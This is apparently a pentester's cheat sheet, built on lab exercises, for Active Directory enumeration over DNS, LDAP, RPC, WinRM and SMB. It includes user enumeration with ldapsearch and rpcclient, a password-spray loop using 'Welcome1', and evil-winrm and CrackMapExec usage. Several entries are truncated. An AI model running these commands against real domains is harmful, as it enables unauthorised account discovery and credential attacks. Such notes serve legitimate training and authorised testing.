🔎AD Post Enumeration/Exploitation

DNS

Kerberos
dir \\za.tryhackme.com\SYSVOL
NTLM
dir \\<DC IP>\SYSVOL

To try to leak dns info:

nslookup
server <ip>

Powershell DNS config:

$dnsip = "<DC IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

LDAP(389)

ldapsearch -x -H ldap://<ip> -s base namingcontexts

Then use -b to select and then filter,etc ..

Ex:

ldapsearch -x -b "DC=htb,DC=local" -H ldap://10.10.10.161 'objectClass=Person' sAMAccountName

To use kerberos authentication:

kinit d.klay
ldapsearch -H ldap://dc.absolute.htb -s base -Y GSSAPI -b "cn=users,dc=absolute,dc=htb" "user" "description"

To get list of users:

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

EXAMPLES:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch  -D 'ldap@support.htb' -w 'password' -b "DC=support,DC=htb" -H ldap://support.htb

RPC

rpcclient -U '' -N <ip>

Then can do multiple commands:

enumdomusers

If valid users list is present use this to password spray:

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

WinRM(5985)

evil-winrm -u user -p password -i <ip>

SMB(445,139)

CrackMapExec

To check password policy(from kali):

crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''

To get TGT hashes for users with

For enumeration as it handles proxied traffic better:

proxychains nmap -n -Pn -F -sV -sT -oA nmap_results -vvv -iL ${target or targets.txt} -T4 --max-retries 1 --max-rtt-timeout 2s --ttl 50ms --open 

To use kerberos authentication

KRB5CCNAME=svc_smb.ccache ./smbclient.py -k absolute.htb/svc_smb@dc.absolute.htb -target-ip 10.10.11.181

Last updated